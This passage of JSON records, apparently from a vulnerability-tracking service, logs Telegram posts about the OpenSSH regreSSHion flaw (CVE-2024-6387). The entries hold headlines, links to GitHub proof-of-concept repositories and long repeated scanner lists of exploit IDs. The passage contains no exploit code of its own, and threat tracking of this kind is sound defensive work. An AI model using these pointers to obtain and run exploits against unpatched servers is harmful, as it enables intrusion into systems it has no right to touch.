Products\n\nhttps://securityonline.info/cisco-confirms-critical-openssh-regresshion-cve-2024-6387-flaw-in-multiple-products/", "creation_timestamp": "2024-07-09T04:34:11.000000Z"}, {"uuid": "dd5697d7-d9f5-499f-b566-15dd35dba065", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/5203", "content": "\u200aCisco Confirms Critical OpenSSH regreSSHion (CVE-2024-6387) Flaw in Multiple Products\n\nhttps://securityonline.info/cisco-confirms-critical-openssh-regresshion-cve-2024-6387-flaw-in-multiple-products/", "creation_timestamp": "2024-07-08T09:52:01.000000Z"}, {"uuid": "5abb69d5-ea61-479b-b3e2-f7e32f22049a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/LYNXBLACKHHATS/8459", "content": "", "creation_timestamp": "2024-10-09T08:39:30.000000Z"}, {"uuid": "968cd866-4754-4af4-87c7-4d426c226211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/MalaysiaHacktivistz/1157", "content": "PoC Exploit Released for Critical OpenSSH Vulnerability (CVE-2024-6387) \u2013 gbhackers.com\n\nMon, 06 Jan 2025 20:30:02", "creation_timestamp": "2025-01-06T17:03:33.000000Z"}, {"uuid": "f8f7fc45-41b6-40db-ae69-3b7ec698458d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/UneIBuKvHh99ShH8q96vjrsPfRICK5hnCurE4RUtbkUW4byB", "content": "", "creation_timestamp": "2025-01-18T21:44:29.000000Z"}, {"uuid": "52f8d97c-6b9b-4f40-b066-65d417962659", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "exploited", "source": "Telegram/74FvZzrxPZzOFcD3Z7htHxpXJWynycXIyH1ql7Vd7keQiMdK", "content": "", "creation_timestamp": "2024-07-10T06:13:07.000000Z"}, {"uuid": "53727ee7-c925-4399-8d71-19b2365ce315", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/aly9-xm3tZnYCqRBfOSlUz0D8dLGZcQF3iN8H-kAtTWU2it8", "content": "", "creation_timestamp": "2025-01-07T04:38:26.000000Z"}, {"uuid": "0773d0c0-dc31-4e1f-9d92-92e4b18c3099", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/14703", "content": "The Hacker News\nNew OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk\n\nSelect versions of the OpenSSH secure networking suite are susceptible to a new vulnerability that can trigger remote code execution (RCE).\nThe vulnerability, tracked as CVE-2024-6409 (CVSS score: 7.0), is distinct from CVE-2024-6387 (aka RegreSSHion) and relates to a case of code execution in the privsep child process due to a race condition in signal handling. It only impacts versions 8.7p1", "creation_timestamp": "2024-07-10T08:08:21.000000Z"}, {"uuid": "93e96ddc-f6e9-426f-834b-880ebb0016e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/blackcybersec/86", "content": "https://github.com/ThatNotEasy/CVE-2024-6387", "creation_timestamp": "2024-07-15T20:56:16.000000Z"}, {"uuid": "a4305375-10f5-4d8d-b58e-7fbdadf8c541", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/MalaysiaHacktivistz/10582", "content": "33D623F7-98E0-5F75-80FA-81AA666D1340   9.8     https://vulners.com/githubexploit/33D623F7-98E0-5F75-80FA-81AA666D1340        *EXPLOIT*              |       0221525F-07F5-5790-912D-F4B9E2D1B587   9.8     https://vulners.com/githubexploit/0221525F-07F5-5790-912D-F4B9E2D1B587        *EXPLOIT*              |       95499236-C9FE-56A6-9D7D-E943A24B633A   8.9     https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A        *EXPLOIT*              |       PACKETSTORM:179290      8.1   https://vulners.com/packetstorm/PACKETSTORM:179290      *EXPLOIT*              |       FB2E9ED1-43D7-585C-A197-0D6628B20134   8.1     https://vulners.com/githubexploit/FB2E9ED1-43D7-585C-A197-0D6628B20134        *EXPLOIT*              |       FA3992CE-9C4C-5350-8134-177126E0BD3F   8.1     https://vulners.com/githubexploit/FA3992CE-9C4C-5350-8134-177126E0BD3F        *EXPLOIT*              |       F8981437-1287-5B69-93F1-657DFB1DCE59   8.1     https://vulners.com/githubexploit/F8981437-1287-5B69-93F1-657DFB1DCE59        *EXPLOIT*              |       F58A5CB2-2174-586F-9CA9-4C47F8F38B5E   8.1     https://vulners.com/githubexploit/F58A5CB2-2174-586F-9CA9-4C47F8F38B5E        *EXPLOIT*              |       EFD615F0-8F17-5471-AA83-0F491FD497AF   8.1     https://vulners.com/githubexploit/EFD615F0-8F17-5471-AA83-0F491FD497AF        *EXPLOIT*              |       EC20B9C2-6857-5848-848A-A9F430D13EEB   8.1     https://vulners.com/githubexploit/EC20B9C2-6857-5848-848A-A9F430D13EEB        *EXPLOIT*              |       EB13CBD6-BC93-5F14-A210-AC0B5A1D8572   8.1     https://vulners.com/githubexploit/EB13CBD6-BC93-5F14-A210-AC0B5A1D8572        *EXPLOIT*              |       E660E1AF-7A87-57E2-AEEF-CA14E1FEF7CD   8.1     https://vulners.com/githubexploit/E660E1AF-7A87-57E2-AEEF-CA14E1FEF7CD        *EXPLOIT*              |       E543E274-C20A-582A-8F8E-F8E3F381C345   8.1     https://vulners.com/githubexploit/E543E274-C20A-582A-8F8E-F8E3F381C345        *EXPLOIT*              |       E34FCCEC-226E-5A46-9B1C-BCD6EF7D3257   8.1     https://vulners.com/githubexploit/E34FCCEC-226E-5A46-9B1C-BCD6EF7D3257        *EXPLOIT*              |       E24EEC0A-40F7-5BBC-9E4D-7B13522FF915   8.1     https://vulners.com/githubexploit/E24EEC0A-40F7-5BBC-9E4D-7B13522FF915        *EXPLOIT*              |       DC798E98-BA77-5F86-9C16-0CF8CD540EBB   8.1     https://vulners.com/githubexploit/DC798E98-BA77-5F86-9C16-0CF8CD540EBB        *EXPLOIT*              |       DC473885-F54C-5F76-BAFD-0175E4A90C1D   8.1     https://vulners.com/githubexploit/DC473885-F54C-5F76-BAFD-0175E4A90C1D        *EXPLOIT*              |       D85F08E9-DB96-55E9-8DD2-22F01980F360   8.1     https://vulners.com/githubexploit/D85F08E9-DB96-55E9-8DD2-22F01980F360        *EXPLOIT*              |       D572250A-BE94-501D-90C4-14A6C9C0AC47   8.1     https://vulners.com/githubexploit/D572250A-BE94-501D-90C4-14A6C9C0AC47        *EXPLOIT*              |       D1E049F1-393E-552D-80D1-675022B26911   8.1     https://vulners.com/githubexploit/D1E049F1-393E-552D-80D1-675022B26911        *EXPLOIT*              |       CVE-2024-6387   8.1     https://vulners.com/cve/CVE-2024-6387         |       CFEBF7AF-651A-5302-80B8-F8146D5B33A6   8.1     https://vulners.com/githubexploit/CFEBF7AF-651A-5302-80B8-F8146D5B33A6        *EXPLOIT*              |       CF80DDA9-42E7-5E06-8DA8-84C72658E191   8.1     https://vulners.com/githubexploit/CF80DDA9-42E7-5E06-8DA8-84C72658E191        *EXPLOIT*              |       CB2926E1-2355-5C82-A42A-D4F72F114F9B   8.1     https://vulners.com/githubexploit/CB2926E1-2355-5C82-A42A-D4F72F114F9B        *EXPLOIT*              |       C6FB6D50-F71D-5870-B671-D6A09A95627F   8.1     https://vulners.com/githubexploit/C6FB6D50-F71D-5870-B671-D6A09A95627F        *EXPLOIT*              |       C623D558-C162-5D17-88A5-4799A2BEC001   8.1     https://vulners.com/githubexploit/C623D558-C162-5D17-88A5-4799A2BEC001        *EXPLOIT*              |       C5B2D4A1-8C3B-5FF7-B620-EDE207B027A0   8.1     https://vulners.com/githubexploit/C5B2D4A1-8C3B-5FF7-B620-EDE207B027A0        *EXPLOIT*              |", "creation_timestamp": "2025-04-01T08:49:50.000000Z"}, {"uuid": "1cbf8635-24c7-4eb4-bd60-a0590caf1334", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/MalaysiaHacktivistz/10588", "content": "D572250A-BE94-501D-90C4-14A6C9C0AC47   8.1     https://vulners.com/githubexploit/D572250A-BE94-501D-90C4-14A6C9C0AC47        *EXPLOIT*              |       D1E049F1-393E-552D-80D1-675022B26911   8.1     https://vulners.com/githubexploit/D1E049F1-393E-552D-80D1-675022B26911        *EXPLOIT*              |       CVE-2024-6387   8.1     https://vulners.com/cve/CVE-2024-6387         |       CFEBF7AF-651A-5302-80B8-F8146D5B33A6   8.1     https://vulners.com/githubexploit/CFEBF7AF-651A-5302-80B8-F8146D5B33A6        *EXPLOIT*              |       CF80DDA9-42E7-5E06-8DA8-84C72658E191   8.1     https://vulners.com/githubexploit/CF80DDA9-42E7-5E06-8DA8-84C72658E191        *EXPLOIT*              |       CB2926E1-2355-5C82-A42A-D4F72F114F9B   8.1     https://vulners.com/githubexploit/CB2926E1-2355-5C82-A42A-D4F72F114F9B        *EXPLOIT*              |       C6FB6D50-F71D-5870-B671-D6A09A95627F   8.1     https://vulners.com/githubexploit/C6FB6D50-F71D-5870-B671-D6A09A95627F        *EXPLOIT*              |       C623D558-C162-5D17-88A5-4799A2BEC001   8.1     https://vulners.com/githubexploit/C623D558-C162-5D17-88A5-4799A2BEC001        *EXPLOIT*              |       C5B2D4A1-8C3B-5FF7-B620-EDE207B027A0   8.1     https://vulners.com/githubexploit/C5B2D4A1-8C3B-5FF7-B620-EDE207B027A0        *EXPLOIT*              |       C185263E-3E67-5550-B9C0-AB9C15351960   8.1     https://vulners.com/githubexploit/C185263E-3E67-5550-B9C0-AB9C15351960        *EXPLOIT*              |       BDA609DA-6936-50DC-A325-19FE2CC68562   8.1     https://vulners.com/githubexploit/BDA609DA-6936-50DC-A325-19FE2CC68562        *EXPLOIT*              |       AA539633-36A9-53BC-97E8-19BC0E4E8D37   8.1     https://vulners.com/githubexploit/AA539633-36A9-53BC-97E8-19BC0E4E8D37        *EXPLOIT*              |       A377249D-3C48-56C9-98D6-C47013B3A043   8.1     https://vulners.com/githubexploit/A377249D-3C48-56C9-98D6-C47013B3A043        *EXPLOIT*              |       9CDFE38D-80E9-55D4-A7A8-D5C20821303E   8.1     https://vulners.com/githubexploit/9CDFE38D-80E9-55D4-A7A8-D5C20821303E        *EXPLOIT*              |       9A6454E9-662A-5A75-8261-73F46290FC3C   8.1     https://vulners.com/githubexploit/9A6454E9-662A-5A75-8261-73F46290FC3C        *EXPLOIT*              |       92254168-3B26-54C9-B9BE-B4B7563586B5   8.1     https://vulners.com/githubexploit/92254168-3B26-54C9-B9BE-B4B7563586B5        *EXPLOIT*              |       91752937-D1C1-5913-A96F-72F8B8AB4280   8.1     https://vulners.com/githubexploit/91752937-D1C1-5913-A96F-72F8B8AB4280        *EXPLOIT*              |       906CD901-3758-5F2C-8FA6-386BF9378AB3   8.1     https://vulners.com/githubexploit/906CD901-3758-5F2C-8FA6-386BF9378AB3        *EXPLOIT*              |       896B5857-A9C8-5342-934A-74F1EA1934CF   8.1     https://vulners.com/githubexploit/896B5857-A9C8-5342-934A-74F1EA1934CF        *EXPLOIT*              |       81F0C05A-8650-5DE8-97E9-0D89F1807E5D   8.1     https://vulners.com/githubexploit/81F0C05A-8650-5DE8-97E9-0D89F1807E5D        *EXPLOIT*              |       7C7167AF-E780-5506-BEFA-02E5362E8E48   8.1     https://vulners.com/githubexploit/7C7167AF-E780-5506-BEFA-02E5362E8E48        *EXPLOIT*              |       7AA8980D-D89F-57EB-BFD1-18ED3AB1A7DD   8.1     https://vulners.com/githubexploit/7AA8980D-D89F-57EB-BFD1-18ED3AB1A7DD        *EXPLOIT*              |       79FE1ED7-EB3D-5978-A12E-AAB1FFECCCAC   8.1     https://vulners.com/githubexploit/79FE1ED7-EB3D-5978-A12E-AAB1FFECCCAC        *EXPLOIT*              |       795762E3-BAB4-54C6-B677-83B0ACC2B163   8.1     https://vulners.com/githubexploit/795762E3-BAB4-54C6-B677-83B0ACC2B163        *EXPLOIT*              |       77DAD6A9-8142-5591-8605-C5DADE4EE744   8.1     https://vulners.com/githubexploit/77DAD6A9-8142-5591-8605-C5DADE4EE744        *EXPLOIT*              |       743E5025-3BB8-5EC4-AC44-2AA679730661   8.1     https://vulners.com/githubexploit/743E5025-3BB8-5EC4-AC44-2AA679730661        *EXPLOIT*              |       73A19EF9-346D-5B2B-9792-05D9FE3414E2   8.1     https://vulners.com/githubexploit/73A19EF9-346D-5B2B-9792-05D9FE3414E2", "creation_timestamp": "2025-04-01T08:49:50.000000Z"}, {"uuid": "42680eb4-2a69-4ad0-a724-19705ac9ab7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1541", "content": "\ud83d\udea8PoC Released\ud83d\udea8A signal handler race condition in OpenSSH's server (sshd)\n\nhttps://github.com/zgzhang/cve-2024-6387-poc\n\nhttps://x.com/DarkWebInformer/status/1807769341426864430", "creation_timestamp": "2024-07-01T15:38:30.000000Z"}, {"uuid": "b3674d55-ff9a-4159-908b-02cf8f71bcda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/tQB9TQkB3J2f-xHv9VyB66SzEWjmEnPEl10mSthgLSK5Gw", "content": "", "creation_timestamp": "2024-07-02T11:45:17.000000Z"}, {"uuid": "35e0eab2-7b7b-4e5e-bfb8-07dfa2988d16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/MalaysiaHacktivistz/2975", "content": "D572250A-BE94-501D-90C4-14A6C9C0AC47   8.1     https://vulners.com/githubexploit/D572250A-BE94-501D-90C4-14A6C9C0AC47        *EXPLOIT*              |       D1E049F1-393E-552D-80D1-675022B26911   8.1     https://vulners.com/githubexploit/D1E049F1-393E-552D-80D1-675022B26911        *EXPLOIT*              |       CVE-2024-6387   8.1     https://vulners.com/cve/CVE-2024-6387         |       CFEBF7AF-651A-5302-80B8-F8146D5B33A6   8.1     https://vulners.com/githubexploit/CFEBF7AF-651A-5302-80B8-F8146D5B33A6        *EXPLOIT*              |       CF80DDA9-42E7-5E06-8DA8-84C72658E191   8.1     https://vulners.com/githubexploit/CF80DDA9-42E7-5E06-8DA8-84C72658E191        *EXPLOIT*              |       CB2926E1-2355-5C82-A42A-D4F72F114F9B   8.1     https://vulners.com/githubexploit/CB2926E1-2355-5C82-A42A-D4F72F114F9B        *EXPLOIT*              |       C6FB6D50-F71D-5870-B671-D6A09A95627F   8.1     https://vulners.com/githubexploit/C6FB6D50-F71D-5870-B671-D6A09A95627F        *EXPLOIT*              |       C623D558-C162-5D17-88A5-4799A2BEC001   8.1     https://vulners.com/githubexploit/C623D558-C162-5D17-88A5-4799A2BEC001        *EXPLOIT*              |       C5B2D4A1-8C3B-5FF7-B620-EDE207B027A0   8.1     https://vulners.com/githubexploit/C5B2D4A1-8C3B-5FF7-B620-EDE207B027A0        *EXPLOIT*              |       C185263E-3E67-5550-B9C0-AB9C15351960   8.1     https://vulners.com/githubexploit/C185263E-3E67-5550-B9C0-AB9C15351960        *EXPLOIT*              |       BDA609DA-6936-50DC-A325-19FE2CC68562   8.1     https://vulners.com/githubexploit/BDA609DA-6936-50DC-A325-19FE2CC68562        *EXPLOIT*              |       AA539633-36A9-53BC-97E8-19BC0E4E8D37   8.1     https://vulners.com/githubexploit/AA539633-36A9-53BC-97E8-19BC0E4E8D37        *EXPLOIT*              |       A377249D-3C48-56C9-98D6-C47013B3A043   8.1     https://vulners.com/githubexploit/A377249D-3C48-56C9-98D6-C47013B3A043        *EXPLOIT*              |       9CDFE38D-80E9-55D4-A7A8-D5C20821303E   8.1     https://vulners.com/githubexploit/9CDFE38D-80E9-55D4-A7A8-D5C20821303E        *EXPLOIT*              |       9A6454E9-662A-5A75-8261-73F46290FC3C   8.1     https://vulners.com/githubexploit/9A6454E9-662A-5A75-8261-73F46290FC3C        *EXPLOIT*              |       92254168-3B26-54C9-B9BE-B4B7563586B5   8.1     https://vulners.com/githubexploit/92254168-3B26-54C9-B9BE-B4B7563586B5        *EXPLOIT*              |       91752937-D1C1-5913-A96F-72F8B8AB4280   8.1     https://vulners.com/githubexploit/91752937-D1C1-5913-A96F-72F8B8AB4280        *EXPLOIT*              |       906CD901-3758-5F2C-8FA6-386BF9378AB3   8.1     https://vulners.com/githubexploit/906CD901-3758-5F2C-8FA6-386BF9378AB3        *EXPLOIT*              |       896B5857-A9C8-5342-934A-74F1EA1934CF   8.1     https://vulners.com/githubexploit/896B5857-A9C8-5342-934A-74F1EA1934CF        *EXPLOIT*              |       81F0C05A-8650-5DE8-97E9-0D89F1807E5D   8.1     https://vulners.com/githubexploit/81F0C05A-8650-5DE8-97E9-0D89F1807E5D        *EXPLOIT*              |       7C7167AF-E780-5506-BEFA-02E5362E8E48   8.1     https://vulners.com/githubexploit/7C7167AF-E780-5506-BEFA-02E5362E8E48        *EXPLOIT*              |       7AA8980D-D89F-57EB-BFD1-18ED3AB1A7DD   8.1     https://vulners.com/githubexploit/7AA8980D-D89F-57EB-BFD1-18ED3AB1A7DD        *EXPLOIT*              |       79FE1ED7-EB3D-5978-A12E-AAB1FFECCCAC   8.1     https://vulners.com/githubexploit/79FE1ED7-EB3D-5978-A12E-AAB1FFECCCAC        *EXPLOIT*              |       795762E3-BAB4-54C6-B677-83B0ACC2B163   8.1     https://vulners.com/githubexploit/795762E3-BAB4-54C6-B677-83B0ACC2B163        *EXPLOIT*              |       77DAD6A9-8142-5591-8605-C5DADE4EE744   8.1     https://vulners.com/githubexploit/77DAD6A9-8142-5591-8605-C5DADE4EE744        *EXPLOIT*              |       743E5025-3BB8-5EC4-AC44-2AA679730661   8.1     https://vulners.com/githubexploit/743E5025-3BB8-5EC4-AC44-2AA679730661        *EXPLOIT*              |       73A19EF9-346D-5B2B-9792-05D9FE3414E2   8.1     https://vulners.com/githubexploit/73A19EF9-346D-5B2B-9792-05D9FE3414E2", "creation_timestamp": "2025-04-01T08:49:51.000000Z"}, {"uuid": "628f79d1-150d-4a9d-a244-1f7061dd73ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/MalaysiaHacktivistz/2969", "content": "33D623F7-98E0-5F75-80FA-81AA666D1340   9.8     https://vulners.com/githubexploit/33D623F7-98E0-5F75-80FA-81AA666D1340        *EXPLOIT*              |       0221525F-07F5-5790-912D-F4B9E2D1B587   9.8     https://vulners.com/githubexploit/0221525F-07F5-5790-912D-F4B9E2D1B587        *EXPLOIT*              |       95499236-C9FE-56A6-9D7D-E943A24B633A   8.9     https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A        *EXPLOIT*              |       PACKETSTORM:179290      8.1   https://vulners.com/packetstorm/PACKETSTORM:179290      *EXPLOIT*              |       FB2E9ED1-43D7-585C-A197-0D6628B20134   8.1     https://vulners.com/githubexploit/FB2E9ED1-43D7-585C-A197-0D6628B20134        *EXPLOIT*              |       FA3992CE-9C4C-5350-8134-177126E0BD3F   8.1     https://vulners.com/githubexploit/FA3992CE-9C4C-5350-8134-177126E0BD3F        *EXPLOIT*              |       F8981437-1287-5B69-93F1-657DFB1DCE59   8.1     https://vulners.com/githubexploit/F8981437-1287-5B69-93F1-657DFB1DCE59        *EXPLOIT*              |       F58A5CB2-2174-586F-9CA9-4C47F8F38B5E   8.1     https://vulners.com/githubexploit/F58A5CB2-2174-586F-9CA9-4C47F8F38B5E        *EXPLOIT*              |       EFD615F0-8F17-5471-AA83-0F491FD497AF   8.1     https://vulners.com/githubexploit/EFD615F0-8F17-5471-AA83-0F491FD497AF        *EXPLOIT*              |       EC20B9C2-6857-5848-848A-A9F430D13EEB   8.1     https://vulners.com/githubexploit/EC20B9C2-6857-5848-848A-A9F430D13EEB        *EXPLOIT*              |       EB13CBD6-BC93-5F14-A210-AC0B5A1D8572   8.1     https://vulners.com/githubexploit/EB13CBD6-BC93-5F14-A210-AC0B5A1D8572        *EXPLOIT*              |       E660E1AF-7A87-57E2-AEEF-CA14E1FEF7CD   8.1     https://vulners.com/githubexploit/E660E1AF-7A87-57E2-AEEF-CA14E1FEF7CD        *EXPLOIT*              |       E543E274-C20A-582A-8F8E-F8E3F381C345   8.1     https://vulners.com/githubexploit/E543E274-C20A-582A-8F8E-F8E3F381C345        *EXPLOIT*              |       E34FCCEC-226E-5A46-9B1C-BCD6EF7D3257   8.1     https://vulners.com/githubexploit/E34FCCEC-226E-5A46-9B1C-BCD6EF7D3257        *EXPLOIT*              |       E24EEC0A-40F7-5BBC-9E4D-7B13522FF915   8.1     https://vulners.com/githubexploit/E24EEC0A-40F7-5BBC-9E4D-7B13522FF915        *EXPLOIT*              |       DC798E98-BA77-5F86-9C16-0CF8CD540EBB   8.1     https://vulners.com/githubexploit/DC798E98-BA77-5F86-9C16-0CF8CD540EBB        *EXPLOIT*              |       DC473885-F54C-5F76-BAFD-0175E4A90C1D   8.1     https://vulners.com/githubexploit/DC473885-F54C-5F76-BAFD-0175E4A90C1D        *EXPLOIT*              |       D85F08E9-DB96-55E9-8DD2-22F01980F360   8.1     https://vulners.com/githubexploit/D85F08E9-DB96-55E9-8DD2-22F01980F360        *EXPLOIT*              |       D572250A-BE94-501D-90C4-14A6C9C0AC47   8.1     https://vulners.com/githubexploit/D572250A-BE94-501D-90C4-14A6C9C0AC47        *EXPLOIT*              |       D1E049F1-393E-552D-80D1-675022B26911   8.1     https://vulners.com/githubexploit/D1E049F1-393E-552D-80D1-675022B26911        *EXPLOIT*              |       CVE-2024-6387   8.1     https://vulners.com/cve/CVE-2024-6387         |       CFEBF7AF-651A-5302-80B8-F8146D5B33A6   8.1     https://vulners.com/githubexploit/CFEBF7AF-651A-5302-80B8-F8146D5B33A6        *EXPLOIT*              |       CF80DDA9-42E7-5E06-8DA8-84C72658E191   8.1     https://vulners.com/githubexploit/CF80DDA9-42E7-5E06-8DA8-84C72658E191        *EXPLOIT*              |       CB2926E1-2355-5C82-A42A-D4F72F114F9B   8.1     https://vulners.com/githubexploit/CB2926E1-2355-5C82-A42A-D4F72F114F9B        *EXPLOIT*              |       C6FB6D50-F71D-5870-B671-D6A09A95627F   8.1     https://vulners.com/githubexploit/C6FB6D50-F71D-5870-B671-D6A09A95627F        *EXPLOIT*              |       C623D558-C162-5D17-88A5-4799A2BEC001   8.1     https://vulners.com/githubexploit/C623D558-C162-5D17-88A5-4799A2BEC001        *EXPLOIT*              |       C5B2D4A1-8C3B-5FF7-B620-EDE207B027A0   8.1     https://vulners.com/githubexploit/C5B2D4A1-8C3B-5FF7-B620-EDE207B027A0        *EXPLOIT*              |", "creation_timestamp": "2025-04-01T08:49:51.000000Z"}, {"uuid": "bcc1e2b8-55f5-4528-a841-aac0782fb8cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/MalaysiaHacktivistz/2963", "content": "9.8     https://vulners.com/githubexploit/8AD01159-548E-546E-AA87-2DE89F3927EC        *EXPLOIT*              |       5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A   9.8     https://vulners.com/githubexploit/5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A        *EXPLOIT*              |       33D623F7-98E0-5F75-80FA-81AA666D1340   9.8     https://vulners.com/githubexploit/33D623F7-98E0-5F75-80FA-81AA666D1340        *EXPLOIT*              |       0221525F-07F5-5790-912D-F4B9E2D1B587   9.8     https://vulners.com/githubexploit/0221525F-07F5-5790-912D-F4B9E2D1B587        *EXPLOIT*              |       95499236-C9FE-56A6-9D7D-E943A24B633A   8.9     https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A        *EXPLOIT*              |       PACKETSTORM:179290      8.1   https://vulners.com/packetstorm/PACKETSTORM:179290      *EXPLOIT*              |       FB2E9ED1-43D7-585C-A197-0D6628B20134   8.1     https://vulners.com/githubexploit/FB2E9ED1-43D7-585C-A197-0D6628B20134        *EXPLOIT*              |       FA3992CE-9C4C-5350-8134-177126E0BD3F   8.1     https://vulners.com/githubexploit/FA3992CE-9C4C-5350-8134-177126E0BD3F        *EXPLOIT*              |       F8981437-1287-5B69-93F1-657DFB1DCE59   8.1     https://vulners.com/githubexploit/F8981437-1287-5B69-93F1-657DFB1DCE59        *EXPLOIT*              |       F58A5CB2-2174-586F-9CA9-4C47F8F38B5E   8.1     https://vulners.com/githubexploit/F58A5CB2-2174-586F-9CA9-4C47F8F38B5E        *EXPLOIT*              |       EFD615F0-8F17-5471-AA83-0F491FD497AF   8.1     https://vulners.com/githubexploit/EFD615F0-8F17-5471-AA83-0F491FD497AF        *EXPLOIT*              |       EC20B9C2-6857-5848-848A-A9F430D13EEB   8.1     https://vulners.com/githubexploit/EC20B9C2-6857-5848-848A-A9F430D13EEB        *EXPLOIT*              |       EB13CBD6-BC93-5F14-A210-AC0B5A1D8572   8.1     https://vulners.com/githubexploit/EB13CBD6-BC93-5F14-A210-AC0B5A1D8572        *EXPLOIT*              |       E660E1AF-7A87-57E2-AEEF-CA14E1FEF7CD   8.1     https://vulners.com/githubexploit/E660E1AF-7A87-57E2-AEEF-CA14E1FEF7CD        *EXPLOIT*              |       E543E274-C20A-582A-8F8E-F8E3F381C345   8.1     https://vulners.com/githubexploit/E543E274-C20A-582A-8F8E-F8E3F381C345        *EXPLOIT*              |       E34FCCEC-226E-5A46-9B1C-BCD6EF7D3257   8.1     https://vulners.com/githubexploit/E34FCCEC-226E-5A46-9B1C-BCD6EF7D3257        *EXPLOIT*              |       E24EEC0A-40F7-5BBC-9E4D-7B13522FF915   8.1     https://vulners.com/githubexploit/E24EEC0A-40F7-5BBC-9E4D-7B13522FF915        *EXPLOIT*              |       DC798E98-BA77-5F86-9C16-0CF8CD540EBB   8.1     https://vulners.com/githubexploit/DC798E98-BA77-5F86-9C16-0CF8CD540EBB        *EXPLOIT*              |       DC473885-F54C-5F76-BAFD-0175E4A90C1D   8.1     https://vulners.com/githubexploit/DC473885-F54C-5F76-BAFD-0175E4A90C1D        *EXPLOIT*              |       D85F08E9-DB96-55E9-8DD2-22F01980F360   8.1     https://vulners.com/githubexploit/D85F08E9-DB96-55E9-8DD2-22F01980F360        *EXPLOIT*              |       D572250A-BE94-501D-90C4-14A6C9C0AC47   8.1     https://vulners.com/githubexploit/D572250A-BE94-501D-90C4-14A6C9C0AC47        *EXPLOIT*              |       D1E049F1-393E-552D-80D1-675022B26911   8.1     https://vulners.com/githubexploit/D1E049F1-393E-552D-80D1-675022B26911        *EXPLOIT*              |       CVE-2024-6387   8.1     https://vulners.com/cve/CVE-2024-6387         |       CFEBF7AF-651A-5302-80B8-F8146D5B33A6   8.1     https://vulners.com/githubexploit/CFEBF7AF-651A-5302-80B8-F8146D5B33A6        *EXPLOIT*              |       CF80DDA9-42E7-5E06-8DA8-84C72658E191   8.1     https://vulners.com/githubexploit/CF80DDA9-42E7-5E06-8DA8-84C72658E191        *EXPLOIT*              |       CB2926E1-2355-5C82-A42A-D4F72F114F9B   8.1     https://vulners.com/githubexploit/CB2926E1-2355-5C82-A42A-D4F72F114F9B        *EXPLOIT*              |       C6FB6D50-F71D-5870-B671-D6A09A95627F   8.1     https://vulners.com/githubexploit/C6FB6D50-F71D-5870-B671-D6A09A95627F        *EXPLOIT*              |       C623D558-C162-5D17-88A5-4799A2BEC001", "creation_timestamp": "2025-04-01T08:49:51.000000Z"}, {"uuid": "d06ac5f1-a75c-4d9b-8126-7b8ff4298048", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/HGVHHAOjdQ8G0s98MRzrQcsQxAqt3Q3ZruYK3m6o5sT1PeY", "content": "", "creation_timestamp": "2025-01-06T17:03:30.000000Z"}, {"uuid": 